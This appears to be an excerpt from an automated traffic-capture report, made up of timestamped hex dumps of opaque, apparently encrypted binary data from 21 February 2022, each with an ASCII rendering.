                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC41INData Raw: 69 17 f0 e8 89 fc b9 d8 f0 b1 60 da a6 d4 ed 1e 58 30 3f 85 ba da d1 c4 69 22 d7 7c 36 7d 29 2a 24 7f cc 99 1f d6 e8 71 a6 1d e8 9f 4e 15 60 5b 92 9e 73 5a 13 37 12 5d 2e 8f 88 a4 ff 51 cf af c2 e4 7e 3a 25 41 09 8c 91 43 66 c1 ea b2 e8 65 a3 b9 92 2d 03 ac e7 f5 a5 bb 5b 1a 5b 78 b5 5c 8c 3f ce 5a 3c e6 f5 82 93 11 0b 2d 91 2d b3 90 33 65 a0 84 51 0e 7f 2a 08 28 e9 19 cb d5 c2 50 30 07 32 31 dd 0c e5 95 a9 cb 5f 4c 99 90 0b 5f 7d cd 8d bf 88 d9 e6 4d 8d 3e 3c b7 b2 36 67 fc 84 a5 c1 a1 eb 9a 05 e1 11 69 5b cf 9f 89 07 53 b8 16 26 c8 e0 6a c0 8a 6a 76 19 9f f7 4a fc 79 28 4e a2 7f 63 b9 66 dc 34 ff c4 95 44 1a 47 af a6 dc e2 63 cc de ba cc e7 be 54 86 91 a0 76 17 f8 eb 17 ec af af 3d 97 9e b2 f4 f9 a3 37 da 27 b8 78 8a 12 48 58 a6 d8 a9 99 d3 9c 27 ce 12
                                                                                                                                                                                                                              Data Ascii: i`X0?i"|6})*$qN`[sZ7].Q~:%ACfe-[[x\?Z<--3eQ*(P021_L_}M><6gi[S&jjvJy(Ncf4DGcTv=7'xHX'
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC42INData Raw: de 22 5e 97 ce 0e b2 96 76 66 e5 61 d5 9a 52 dd 05 72 49 55 84 30 ac 0c 32 5d 36 7a 74 a3 57 7d e5 4a e3 81 81 52 4b f8 ba b5 c7 e2 b0 ad 81 a3 53 5b 81 f6 07 e9 42 f2 5d 73 46 6f da a5 c1 6d 94 0c cc c1 c0 af 60 c4 c8 10 b0 49 fd c2 7a e9 4a af dc e7 bc 06 8d 67 10 66 90 b3 fb ec c4 16 c5 e4 d9 cc 43 18 7c 9c 0b 94 23 bc 37 49 13 71 6c 8b 78 88 e4 32 0e 7b d6 ab 2f 43 62 af 21 96 55 93 6e b1 2e 25 f4 09 50 17 c7 7b ce c9 ea 56 68 7c 8c a3 af 09 fb 42 72 ef e2 43 c1 4d b2 63 51 cf c0 33 dc 8a 1b 8b ed 5b 32 a7 d4 df bc 48 d4 d8 d8 b1 24 69 d2 92 d8 f7 38 35 e3 00 b9 e3 09 de 14 15 20 a6 f9 12 b2 2c f9 34 74 a4 e0 3e a2 68 6e cd 34 72 54 bd 7f c5 9f b4 57 bb 38 59 88 cf 48 bc 7c 9a 4e cd 73 a4 9a 21 20 a1 17 f4 7a a3 2d 12 ea d5 e8 5c 4d 0d a3 15 15 e5 50
                                                                                                                                                                                                                              Data Ascii: "^vfaRrIU02]6ztW}JRKS[B]sFom`IzJgfC|#7Iqlx2{/Cb!Un.%P{Vh|BrCMcQ3[2H$i85 ,4t>hn4rTW8YH|Ns! z-\MP
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC43INData Raw: d9 5d f2 66 6b 19 9c 98 4b bc 2f a9 ca bc 82 3c 2b c0 cd 9a d5 dc 16 d4 21 00 c6 6d 39 8b fb 3d 06 48 4a a6 9b cc 3d 5f 25 a0 40 bd 87 25 ec 0b 85 ee aa 4a 1b a1 c7 63 62 03 03 ad ba 39 1d 54 c2 1c d6 a6 2e 97 3a b5 08 22 3d 83 17 73 4a 3a 91 d2 c2 78 e3 83 ec 40 dc 89 1b b0 61 c9 df 00 c2 3e 01 cc e1 5d e8 72 5d b0 c5 94 20 7c 77 ea 54 2b 5d f4 e1 6b 15 c8 35 0c 27 f3 24 23 88 94 cd 6c 46 0a fb dd 3e dd c5 eb 96 07 60 ef 41 0f 50 9c 34 96 b1 1c 7c bc 67 5a ee ab f6 15 c3 3f d2 6a 72 46 5f d3 55 2f 3b cf b8 9c f8 3c 5a c7 08 c5 5d 12 9e 7c 56 38 5b 57 12 67 3e 15 f9 dc 23 bb 50 06 7a 69 7e b4 b1 84 9c 6a e0 dd 0d b6 4d 36 0d cf 1b 1d 7c e5 c2 9b e3 46 24 1c a3 33 37 55 1c 9b eb cd b6 aa f3 43 2e 64 32 ab 48 6a b3 d5 30 56 47 47 cc 7d 88 cd f1 66 96 ee 2e
                                                                                                                                                                                                                              Data Ascii: ]fkK/<+!m9=HJ=_%@%Jcb9T.:"=sJ:x@a>]r] |wT+]k5'$#lF>`AP4|gZ?jrF_U/;<Z]|V8[Wg>#Pzi~jM6|F$37UC.d2Hj0VGG}f.
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC45INData Raw: 10 9d cf eb e1 81 4c 87 d7 98 08 0e 41 43 8a 75 3b 4e 30 1e 5f 8f 7d 1c 8c 05 8e 93 1c 25 c2 a4 72 44 7b 0b a5 2f 43 48 ef 31 10 17 d6 bf b1 2e da 5c c4 12 56 00 cd 23 5e 13 ab 28 3c 9d 6e fd 66 2e 42 72 42 c4 8a 0c 9b fd a3 69 a2 9e ce 22 75 d8 0f b5 0c e9 28 e4 20 ab 56 f9 ec ee 05 23 ee b6 e0 a2 c8 f1 f3 26 6b 96 d3 9c 21 eb 61 51 8b 3a 96 79 24 40 0b 7a a4 5f fb 2b 5c a6 a3 77 00 e2 42 76 ca 28 a6 1d 7a 6c a7 02 c6 44 0e 69 cf 02 15 33 0d 32 53 ac 11 19 fe bd 77 ec 9d 14 78 b5 b8 5c f8 9b 6f ce 67 bb 2f 13 ff 33 a4 d3 77 2d 2f b0 ea d0 b6 00 00 b3 11 b7 ed 5d 32 ac dd d8 14 da 2e 1c b5 7d 21 4e f2 4c eb 59 7a 06 29 90 79 72 6e f1 5d b3 05 c4 d3 04 41 4e 53 cf cb 19 2f e8 2e fd e6 3d 6c e9 35 5f b0 50 be 34 26 49 a5 1d a3 d9 6d 45 29 69 78 18 43 12 5b
                                                                                                                                                                                                                              Data Ascii: LACu;N0_}%rD{/CH1.\V#^(<nf.BrBi"u( V#&k!aQ:y$@z_+\wBv(zlDi32Swx\og/3w-/]2.}!NLYz)yrn]ANS/.=l5_P4&ImE)ixC[
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC46INData Raw: 0a a9 c4 0b 91 50 6c af a9 d5 38 42 b7 30 01 3e 93 05 f3 9b 52 2c d1 f5 7a 79 11 4c d4 d7 40 e2 6d 17 e8 c5 3e 7b 07 ad 7e 45 40 80 07 b1 33 17 21 90 2a 7c 48 e3 e0 48 d7 71 13 d2 06 60 90 37 07 f0 11 20 06 9b f0 08 1e 43 c7 9c 1b 7d af 89 8f 47 30 33 ca dd b5 be 7d dd 86 cc c1 0e 2e 58 b5 66 ae 5e 80 8a 79 d8 31 f8 d5 74 18 14 ba de f7 64 ac b5 0d 90 6c 3f 31 50 98 2f 6c 32 25 3f 7a de bb 5b 81 5a 56 05 3e e4 1c dc 9e 0e be d2 80 66 00 94 bc 5a 5b 89 c9 16 62 3d 25 3f cc 46 6f dc be 94 40 8d d7 e5 aa a4 37 16 be bc c1 5a d3 27 86 96 6c 05 3e 68 09 9c 6f 9e f1 01 82 5b 23 ad 90 44 11 92 be 47 62 71 bd 29 45 01 b6 1b c0 07 47 60 93 b1 71 46 39 94 3f 5c 8e c5 90 25 fa 1f b8 73 38 07 c2 db e3 a0 97 50 cc 49 fa fe 37 3a f7 19 69 4b 51 8c 97 19 67 14 4d 67 b6
                                                                                                                                                                                                                              Data Ascii: Pl8B0>R,zyL@m>{~E@3!*|HHq`7 C}G03}.Xf^y1tdl?1P/l2%?z[ZV>fZ[b=%?Fo@7Z'l>ho[#DGbq)EG`qF9?\%s8PI7:iKQgMg
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC47INData Raw: 0a dd 8e 60 10 dd e1 60 a3 06 b2 67 6b 21 da f7 ff 5f 8a 68 f3 f3 65 dc 14 15 4e cb e8 04 9d 69 1c cb 8b d8 64 32 67 e8 d1 67 ff 18 73 be c0 3a 15 33 38 c4 83 59 fc 7d a7 ea 29 cd 61 9a cc 5b 65 55 b2 cd e1 01 42 75 33 bb fd 8e 34 50 40 50 32 78 68 fa af ac 54 37 45 79 77 f8 bd 69 9b bf d3 27 07 15 68 76 71 0d 13 31 cf ff c1 43 e9 5b 8f 2e 5f 6f 9e fe e9 b4 9a f7 02 b4 91 0f f8 c7 90 71 53 8d b1 bc 49 0c 3b 2f 3b 4c ed 2a 6b d5 c8 41 63 02 eb 35 4f e2 b5 3b f6 dd b6 b2 cc 2c af 07 2e 22 15 43 f8 77 d5 a5 b1 1d 46 a8 30 32 27 5d 19 40 60 f3 b7 2e 76 40 27 6c 04 5e b6 48 b3 b1 c0 ec 71 aa e0 eb 13 9e 62 f5 22 b8 59 2e 6b 17 04 62 02 8d 7d 61 59 fb ab 52 78 f7 8c da e1 5b 75 c5 7d 40 83 56 82 c0 42 d0 c8 01 12 b9 ec 47 79 16 96 16 50 2b 47 9c 31 9b c4 dd c9
                                                                                                                                                                                                                              Data Ascii: ``gk!_heNid2ggs:38Y})a[eUBu34P@P2xhT7Eywi'hvq1C[._oqSI;/;L*kAc5O;,."CwF02']@`.v@'l^Hqb"Y.kb}aYRx[u}@VBGyP+G1
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC48INData Raw: 05 0c 58 93 f3 ac 8d 3c a1 16 9e c5 4a bd ee e7 9a b7 1d 50 03 85 b1 d8 51 06 0e 79 4a db ff 1d 58 6d 3c 67 b8 fd 96 37 0d b3 0b b2 33 7f d2 a4 18 d7 53 0f 0a e8 13 0f a3 1e 44 c5 35 df a5 31 c1 eb 1e 17 f1 ef 76 a7 c6 fb b9 90 55 3d 4a af 8d a0 7c 85 5a 35 ff 3b f1 c9 0b e3 46 21 a8 18 87 79 27 64 19 69 0e 1c 75 b9 e9 d8 52 ae 07 dd 16 37 5b ee 85 c9 9b c7 03 6b a5 18 5f 0f 6c e7 26 54 98 01 97 80 1d fa cf 13 56 ac 93 36 bd d0 88 85 7d 60 25 eb ad 55 3f 3c fa b9 7c f0 e0 3d 34 4c f3 28 5a bf 80 95 09 d5 6f 2b bd 70 f9 0b ee dc c3 7e 25 36 88 11 9f b2 78 94 b3 a4 ef ea 18 63 15 19 7c b4 d9 8a 7d e2 c5 6c 33 7f c2 24 d6 9d 51 d2 0a 2f c9 ab 02 60 09 23 55 4d 84 15 dd 84 b0 0c 32 f6 45 df ef af 23 65 ea 66 f9 72 4d 8d 08 57 ce b6 95 4a e1 3f 22 bf f8 73 31
                                                                                                                                                                                                                              Data Ascii: X<JPQyJXm<g73SD51vU=J|Z5;F!y'diuR7[k_l&TV6}`%U?<|=4L(Zo+p~%6xc|}l3$Q/`#UM2E#efrMWJ?"s1
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC49INData Raw: 69 4d 85 ce 1d c1 3f d6 cb b9 ed fb dd c0 da 6e 2d cd 76 22 e9 ed 10 0f 59 36 1b 15 da 0d 2b 3a f9 98 6a 48 55 59 62 35 d2 cf 9c 3f 2e 1c 5d d1 d4 d7 b0 04 ec cc 38 bc 59 d8 0c db 73 49 40 22 ef 38 ed 3f b8 67 5e e9 b4 f4 a5 09 5c 8e 1c e7 0a eb d1 ff 59 f9 a2 cd f8 64 5c a5 a3 71 b8 d1 e3 a1 a6 99 c7 eb a5 cd 1a 94 f4 5a 2b ff bb cc c1 d3 64 f1 ff b9 c7 7f 7b c3 ce 60 48 50 1a ee 27 3b 23 f7 fd 5d 05 8c b7 af 6d 3d d9 0a b2 95 37 c1 f9 a5 c4 e9 bf 7b af ae d3 fd 96 7c 3c 3f ad b5 ef 69 02 b0 38 0d ca f8 b9 76 ee b6 20 78 5a 45 f9 b9 00 dc 52 c1 7f 83 91 97 10 a7 15 af d7 bc 06 df cd 51 34 ad 8a 78 bc e3 83 15 90 8d 1e 75 2f d2 77 26 2a c9 18 8f ba bd 2a 1f bf 29 11 bb 88 a2 e4 8e 82 e9 88 9f b7 e4 95 16 36 b2 71 3a 6f ff f9 0f f2 d5 d7 73 7d f6 0f 5c 68
                                                                                                                                                                                                                              Data Ascii: iM?n-v"Y6+:jHUYb5?.]8YsI@"8?g^\Yd\qZ+d{`HP';#]m=7{|<?i8v xZERQ4xu/w&**)6q:os}\h
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC50INData Raw: 58 c8 85 78 bb 01 83 73 51 6f 56 c3 a9 36 ae e0 af 32 52 9b a2 44 6d 65 bd e1 69 b8 12 41 a6 14 e6 6d 27 09 e8 16 27 c4 81 e5 f5 09 6e 2a 13 1f 23 52 75 a9 4e c4 06 0e 54 2c 8a 28 ab 48 74 00 2e b6 c4 3a 61 e6 fa 3f 2f f7 21 d8 58 76 79 9c 0a 8c 27 de a5 ab 4c 42 14 73 19 02 61 ed 15 2a 6e 19 40 80 d9 68 be e5 50 ad 5c 76 99 dc d3 8c d5 b0 5d 45 2f 48 ff 35 f7 17 64 cd 01 62 44 f0 89 fd 27 54 d8 a5 a1 bb 1d fc 69 c3 d0 7a 0e 35 96 79 72 57 e7 05 bb 04 94 13 28 dd 21 ac c0 c5 9e a2 a5 da 9f 5c 55 68 eb 35 d2 77 29 c0 29 22 e4 30 4c 96 00 ae 4d 7a 5b 87 f0 03 d7 7e 3b dd 32 7d b6 b8 13 2f f1 8e 47 35 48 a2 b2 48 0d c5 bc d3 1d 4e c2 dd 03 67 76 fb 3f 56 90 c5 e5 b5 a3 7c 51 fe 9d 5e 0c 15 b2 8b 65 8d 60 6b a2 dd 2d 4d 89 05 4c f9 05 7f 76 93 16 15 ef 66 1e
                                                                                                                                                                                                                              Data Ascii: XxsQoV62RDmeiAm''n*#RuNT,(Ht.:a?/!Xvy'LBsa*n@hP\v]E/H5dbD'Tiz5yrW(!\Uh5w))"0LMz[~;2}/G5HHNgv?V|Q^e`k-MLvf
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC52INData Raw: a3 06 a4 d4 20 26 3e ce b3 27 ac b6 a7 ce 5d c7 15 5e 32 99 06 c3 ca ab 5b 47 cc c1 0e 64 90 03 ba c7 d1 c2 2b b5 e5 48 c6 e4 9a 37 6a e0 7a 69 ab 9c 7a cb 94 33 e8 4f 68 5f 00 c9 fd b4 6f a2 b8 32 44 27 10 86 af 0c 0a 47 10 0f a3 7a 75 3a ca d7 36 25 50 83 77 11 23 e7 01 d5 45 6c 49 3d 34 43 29 b8 06 66 ac eb d5 e3 ea b6 40 3e a5 e5 f8 23 17 04 87 05 6e c9 90 10 8d 1e db ae 8b f3 26 ed e6 99 67 06 8b 2a 85 c9 9b ff 59 6a 1b 0c a9 ec 93 93 09 48 96 50 9b 47 21 71 97 1d eb a7 b7 65 d6 dc 75 0f 9c 68 64 a3 d5 6a cf 3b b8 bc 47 33 19 a1 bf fd f0 84 58 04 cd 2c 5f 3d 31 39 ed fb fc 97 fd 57 96 0f e3 64 22 06 7f 32 28 7c 2f 04 e7 ba cd 4f 80 9e c4 b5 52 c7 81 ed 18 61 15 64 a8 29 d0 67 5d ad 31 cc a2 06 9e ac 2c db 22 48 81 9d a2 06 53 59 af 38 29 49 cb 1f 7f
                                                                                                                                                                                                                              Data Ascii: &>']^2[Gd+H7jziz3Oh_o2D'Gzu:6%Pw#ElI=4C)f@>#n&g*YjHPG!qeuhdj;G3X,_=19Wd"2(|/ORad)g]1,"HSY8)I
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC53INData Raw: de 75 6e 5b 42 e6 26 24 ed d2 6f 23 3e 40 77 64 57 00 de ca ac a5 f3 a2 62 e4 2e 58 34 58 59 64 57 00 40 89 8a 7f b4 c7 30 c9 24 19 59 da ad 88 62 67 b3 4e 79 95 b6 5d b2 5b ec 6d c2 8d f8 5c d0 de 04 a8 50 07 0c 13 f1 c0 4e 99 c7 6a ce ce 34 3f 7a 66 b8 f3 1f 22 c4 87 8b 5e 59 ac 3a af 7b 61 9a fc 86 7d 05 bf a7 41 e2 16 51 a3 df 03 79 19 35 45 66 1e 47 ff d5 ee 66 70 ec ae 94 c5 7f 3f bf 91 91 8a be e3 96 21 a1 a3 40 55 72 62 92 0c 61 c4 6a 0b cb e0 77 dd df 2d 94 50 f7 a8 b3 f8 d0 e3 10 b8 05 3b f1 82 65 b5 82 d6 cb 55 d1 86 8b f5 b0 20 41 07 7d a7 55 c9 50 9c 82 ad 62 90 2f b9 eb 2a f7 06 73 49 08 c7 34 97 e9 38 0f 04 fb 95 bf 75 b7 5a 46 11 ca fa a0 49 8e 10 d7 71 68 a7 70 4a 74 19 72 59 f9 10 d6 bf e6 10 d8 ec 01 c3 19 81 cb 72 e1 23 2d c1 47 72 3c
                                                                                                                                                                                                                              Data Ascii: un[B&$o#>@wdWb.X4XYdW@0$YbgNy][m\PNj4?zf"^Y:{a}AQy5EfGfp?!@Urbajw-P;eU A}UPb/*sI48uZFIqhpJtrYr#-Gr<
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC54INData Raw: 9c 7e f6 ba 6a 7b 52 f6 06 46 3f 51 bb 21 87 06 e5 39 07 fc bc af b6 7b 47 e2 8b ae cb 57 e7 78 fa 0a 6d 6f 13 8d 62 4a d6 51 e3 31 e2 0b cb 15 45 31 75 c1 37 64 95 53 63 10 27 db 84 80 e7 26 44 48 4e c3 b3 88 05 b0 98 f9 a0 58 4b 30 a3 0a 44 6f eb a0 fd 44 2b 27 40 3a bc 47 cc 44 a7 31 b5 03 7b 09 c8 d1 32 87 27 f2 93 ad f8 fc 3b c8 57 96 7d a7 de de 79 80 60 1e b7 fa 87 10 62 54 4b 18 47 8c 8a 52 c7 0a 35 27 88 48 a7 a8 35 a2 32 e4 51 4e 33 f2 36 f3 a7 ba 37 5e 3e 4d ef 5b 7a 57 52 31 aa 08 cf 3a 9b 23 65 47 db 16 7c 08 83 c9 d4 0a be 41 82 0e b8 c7 e2 51 f2 72 27 1f 8b 91 b0 f8 96 02 b2 7b 10 40 61 50 ea 32 92 d4 26 8c e7 f0 f2 02 2b 2d 2f a2 81 3b 70 83 6c 46 dd a5 f8 c2 46 cd 77 80 b0 7f 9d 8d 95 3c 68 85 a4 41 17 0c ba 40 8c e4 53 80 6b a5 47 e7 0d
                                                                                                                                                                                                                              Data Ascii: ~j{RF?Q!9{GWxmobJQ1E1u7dSc'&DHNXK0DoD+'@:GD1{2';W}y`bTKGR5'H52QN367^>M[zWR1:#eG|AQr'{@aP2&+-/;plFFw<hA@SkG
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC55INData Raw: c5 f0 d3 6e 5d 31 37 b6 45 c7 50 f8 f3 59 e3 8f a7 0b ad 82 b9 1d 46 59 c2 b0 c7 50 18 06 97 b6 f7 85 df 40 52 9b 80 97 5a c4 27 80 4b 6a 51 a0 69 be b0 45 b3 5d 99 04 59 7d d3 83 64 67 c6 00 30 cc 85 e5 5a 22 d2 e0 8c 94 22 9b f2 80 89 10 d2 05 6a c0 e3 5d 30 7f 29 5e 81 43 db 53 1d d0 da 19 0c f6 31 9b c4 00 11 9f cf 33 ac c7 0a 56 3d 91 11 73 23 61 77 f7 e6 51 cf 18 98 d1 7d 4f 25 8c e5 9b 1f b4 a3 53 b6 de 92 d3 c2 68 f7 9e fe 0d 64 72 33 93 a3 17 da 0f a4 30 24 f4 4f 5c f2 b8 29 12 71 a0 14 d5 8f a9 c9 36 3d 22 02 5b 8b 2c 7c db ec c5 ce dd df 37 b9 e4 1a 62 80 f0 5c 75 34 7f a1 d5 ef c5 86 a5 0d 86 45 09 34 4f ee 6a 5a c6 b5 92 c7 7a 59 04 78 2f 64 c2 1a 4b d2 c2 4d 7d af 46 40 82 bc dc e4 ea 25 0f 95 32 eb 75 95 dd d6 f7 79 8d 98 4d e1 86 d2 0b 19
                                                                                                                                                                                                                              Data Ascii: n]17EPYFYP@RZ'KjQiE]Y}dg0Z""j]0)^CS13V=s#awQ}O%Shdr30$O\)q6="[,|7b\u4E4OjZzYx/dKM}F@%2uyM
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC57INData Raw: 25 b0 aa bf 50 aa ca a5 b8 26 bf 01 5d 2d e1 e4 bb c4 5f be f6 e9 34 f6 52 c5 f6 57 c0 6a 7f 10 21 06 03 a4 7c ca 65 22 13 57 18 33 91 c1 7c b4 91 4c cd 69 61 57 2b ae 81 a1 fd b7 d6 bd 4d df a6 06 45 a6 a4 1a 8d 48 41 33 0f 9f 25 4d eb 0e 79 98 cb a5 a8 30 b4 bb 64 b2 e4 73 a5 59 4f 12 9a 42 52 40 09 1d c4 6b 9b 78 d9 22 d0 63 d0 44 54 5a a8 87 81 ea 5d 9e 12 17 14 34 c7 0c 42 da 38 b6 7a 43 a1 63 bd d4 55 e2 fc 50 23 9b 38 56 48 e7 a3 c4 0b 09 f8 79 84 3c 85 ce 1e c4 02 0b d1 09 4b 84 35 3b b5 20 0a 8e 93 74 ff 8d 5c 70 c9 fe ca bc 23 08 22 ef e2 12 8e 9d 03 b2 80 8c 5c 5f a7 57 00 7d 2e 3e 4b 22 cd 61 0f 79 95 d8 a9 ce f4 17 92 28 89 0a ba 7b 11 1f 67 20 a0 99 57 9d 26 11 fd a9 ea ad 06 4b b0 87 e6 d7 b5 2b a3 91 27 08 00 0c 1e 7e 86 62 31 21 eb 02 35
                                                                                                                                                                                                                              Data Ascii: %P&]-_4RWj!|e"W3|LiaW+MEHA3%My0dsYOBR@kx"cDTZ]4B8zCcUP#8VHy<K5; t\p#"\_W}.>K"ay({g W&K+'~b1!5
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC58INData Raw: d0 c8 01 12 b5 ec 47 79 54 75 58 dc 41 07 09 e1 c2 05 0d 5f f5 fc c8 f1 e2 e8 dc c3 8d 61 22 83 93 0f 8d 4b 27 dc 66 26 97 97 bf f6 24 29 d6 f2 4a 5c ac 49 de f7 5a e9 95 08 d8 f3 6b ed f7 a9 6e d1 7f de 08 68 30 42 f6 be 11 60 34 81 05 b3 98 6e d2 22 3c 36 8e 3d b1 d8 5b 00 e1 d9 ae 84 ca cc a1 e4 21 b8 5b 21 dd 1c 0f 19 aa f0 57 c7 30 db a1 3e a2 0f 79 cf 64 07 02 36 4d 15 9b 76 4f c7 07 5c 06 78 83 64 ed 7e 6d d2 c2 c0 e2 6b 23 8e 82 d4 53 b8 fa a6 98 79 5f aa 30 65 4a 29 62 f3 8b 36 f3 6b 10 d1 7e 57 b0 d0 2b cd b7 bc 65 9c 4f bb 4c da 4e 20 49 5f 60 10 c7 ed 3f a0 86 1b 7b b8 aa d8 b9 f1 26 fb 74 15 68 15 7c 7d 78 b4 e5 0a 1e 55 83 6a 56 cf 21 1e d3 dd 8c c3 6a 94 32 99 dd bc 0a c1 f4 c9 59 31 a3 16 e2 53 10 d0 53 58 4d 3c e3 8c 2a 9e be aa 3c 3f 27
                                                                                                                                                                                                                              Data Ascii: GyTuXA_a"K'f&$)J\IZknh0B`4n"<6=[![!W0>yd6MvO\xd~mk#Sy_0eJ)b6k~W+eOLN I_`?{&th|}xUjV!j2Y1SSXM<*<?'
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC59INData Raw: ac b8 30 9a 4a 0d b6 e7 51 fc ca 02 97 05 b0 cd e2 3b e0 f9 4a c7 b4 be 84 75 7b fd 4d e2 59 81 bb 18 df 52 6d 2b b3 8c 69 a9 ed 68 3b ba 7a 9c f6 42 7d d7 6c 14 b8 a3 cb fc 46 40 aa bb 1c 7f b3 89 54 98 07 d5 29 40 45 bf 6a 42 9c b4 5f 75 ae a3 9b 82 8d 7b 15 a8 c8 a4 f1 0d d6 49 2a c0 bc 2d 6b 47 d7 92 16 cd 30 c5 da bb cd 0c 56 00 fe 69 48 0d a9 27 b8 de e2 68 8c 50 c3 91 10 ad 87 89 72 00 5c 15 34 cc cc 2c f1 a5 cb ad 64 76 5c c0 20 4c 33 14 ed ee 86 60 92 ce 6d 28 8c ea 0c d9 3b fd 18 1d 21 e4 6e fc 9b b9 52 f6 d7 f5 cb 84 df 76 7e e2 28 2a 36 40 8d a4 c6 f3 c5 9e b6 fa 01 f1 23 5a cf b4 47 13 9c d9 8e be 77 9a 21 d8 a9 f6 fd 7a 26 61 60 98 06 1c af bf 69 62 c1 ad cf 7d ac d7 7e f0 0b d3 8c a7 66 d5 ee c8 e4 e8 a5 23 65 0d 62 cf 7e c1 62 d6 91 56 ad
                                                                                                                                                                                                                              Data Ascii: 0JQ;Ju{MYRm+ih;zB}lF@T)@EjB_u{I*-kG0ViH'hPr\4,dv\ L3`m(;!nRv~(*6@#ZGw!z&a`ib}~f#eb~bV
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC61INData Raw: 26 67 a0 78 51 d3 b7 81 f1 23 fa 3c b8 d6 5b 53 e8 0c 40 e7 70 c9 b8 35 3b fb 2d b3 66 51 48 c8 94 86 45 9c 67 a8 6d 4b bd 36 e4 a8 50 a5 f7 11 48 72 35 2a b8 55 ca fb 9d 12 f6 82 cb 04 ac d3 e5 ea 1c 04 6d a6 72 4c 0b 63 d1 9d 7a aa dd cf f0 d8 a0 90 6b cf d4 79 ef e4 d4 2a 7e c6 48 a5 37 34 a8 34 ad 22 10 c7 3c ad 40 29 fe 83 b7 97 8e 90 a8 71 13 da 4c 1c 1e f7 08 1c c8 de 06 9b f3 a6 c6 4e 92 2b 1c d3 70 8f 7d fd f9 a4 99 50 73 ce e3 2e c1 90 3c a1 16 4d 57 ae bb ef 93 4d bf a4 40 65 45 3e 54 b4 5b b9 03 1f 64 ff 4d ad c0 94 62 01 d7 f7 cc 0f cf 30 4a bc f0 2e 29 16 96 cb 0f 0a 47 28 79 c6 85 92 38 ca ab a0 65 51 01 38 50 49 18 76 af b6 fb b9 90 5f f1 dd 83 c5 ea ec 4b 59 67 af 3f 39 99 a7 4a 51 f2 cc 33 7f fa e3 30 89 67 fc 99 81 46 d2 71 14 60 09 fc
                                                                                                                                                                                                                              Data Ascii: &gxQ#<[S@p5;-fQHEgmK6PHr5*UmrLczky*~H744"<@)qLN+p}Ps.<MWM@eE>T[dMb0J.)G(y8eQ8PIv_KYg?9JQ30gFq`
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC62INData Raw: 6c a5 bd 08 ab f6 4e fe ca 54 5b eb 06 10 b3 5d 4a 93 95 3a ad 51 f3 69 7a 57 6a ff b9 c9 c5 2a ec 30 49 23 1d e7 58 f0 71 40 2f 56 71 fa 45 a8 1f 0f 14 9e ae 30 bf 42 e0 88 7e 6d f8 70 ca c2 08 12 3f 05 27 e0 63 ad 52 4f 8b 59 21 b0 3b 92 63 71 bd 02 cf 27 b9 52 fe e4 3d a1 8b d6 f5 ba b0 7e 6f 4c 45 8d 43 82 ff c5 9e 3d 97 b5 31 ae 27 5a 4b d2 79 ca d8 a0 b4 44 65 de ac fe 0a ad 42 f4 e2 29 25 75 bd e8 41 03 64 90 1e 91 4a f1 14 99 65 aa 69 b7 08 62 b0 3f 14 b7 00 cb ec 11 a7 e9 5a 08 44 c8 d9 43 88 45 85 ba 22 7f 96 bd 89 e9 c4 c4 4b 9a e6 63 d0 fc d5 51 30 e8 45 bc 50 49 cb ac 93 18 ce a4 95 3e 43 b3 3d 22 eb 35 0f 6f 6a 53 de dd b6 0c 2b 02 15 04 a8 d8 50 c2 0e 80 d4 1f 4a 7a 33 b5 59 79 06 81 19 ee be f6 48 21 f5 84 5a f1 8e 79 5c 93 cf 9c 7f ec 79
                                                                                                                                                                                                                              Data Ascii: lNT[]J:QizWj*0I#Xq@/VqE0B~mp?'cROY!;cq'R=~oLEC=1'ZKyDeB)%uAdJeib?ZDCE"KcQ0EPI>C="5ojS+PJz3YyH!Zy\y
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC63INData Raw: 30 2b 28 bf 5a 26 25 b5 39 34 e2 ff a1 e3 ae 4d 09 ef 38 6e 70 e5 1d 01 eb b3 1d 08 e8 2e f7 7f 18 c2 68 45 9d 08 f9 71 69 56 ca f0 1f 69 7a 4a d1 6e aa 4e 95 2b 15 d9 f6 85 36 73 32 ec d1 53 47 09 ce 8f 9e 38 46 4c 20 6c 08 c0 e3 88 38 7d e6 e7 7e 8d b2 1c cc 62 27 b4 dd bb 3d 5d 19 5f 6a 71 ae 30 cf a2 31 77 d2 4f 14 1b 22 76 9d f0 42 59 1c 40 7e ff 8b 54 f2 be 52 15 fd d9 4e b5 70 a6 8a 6e 0e 6f dc 64 29 9e b8 e5 68 64 db 3b a4 b6 bc 42 9e a5 2b 0b 26 f1 1e 79 db 44 e5 fc ff 6f e2 0e d2 1b 77 bd 64 ce 54 ba ce a9 bd 3e e7 e8 a7 3d 39 b6 05 59 7c e1 e5 20 53 c5 9b eb 21 5c 46 54 aa 2a 27 46 21 a5 c9 40 33 60 e5 9b dd e7 50 ee b7 e9 ab 61 c2 7c ec e9 cc 81 f6 13 5b 8a 47 be f6 e1 42 a1 f1 9a e6 05 7e 90 cc 64 de 72 cd 70 f5 d0 79 e3 64 7e 4a ed 13 f9 7c
                                                                                                                                                                                                                              Data Ascii: 0+(Z&%94M8np.hEqiVizJnN+6s2SG8FL l8}~b'=]_jq01wO"vBY@~TRNpnod)hd;B+&yDowdT>=9Y| S!\FT*'F!@3`Pa|[GB~drpyd~J|
